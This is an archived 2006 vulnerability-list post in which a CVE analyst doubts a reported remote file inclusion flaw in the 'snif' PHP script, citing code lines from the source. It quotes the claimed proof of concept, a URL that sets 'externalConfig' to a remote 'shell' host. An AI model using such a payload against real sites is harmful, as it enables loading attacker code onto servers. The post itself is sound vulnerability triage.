[VIM] snif RFI curiosity
Steven M. Christey
coley at mitre.org
Mon Dec 4 00:15:09 EST 2006
Researcher: S.W.A.T.
Ref: http://www.milw0rm.com/exploits/2868
Claimed POC:
[path]/index.php?externalConfig=http://shell?
A CVE analyst noted that in the referenced URL, we have:
$externalConfig = "";
on line 428, and:
if ($externalConfig!="") {
include($externalConfig);
}
on line 1227.
While $_GET is cleansed in a way that feels funny on line 1215, there
is no apparent dynamic variable evaluation, include/require, or eval
in between the two lines.
So this report might not be valid, but with such a gap in the code,
I'm not sure.
- Steve
More information about the VIM
mailing list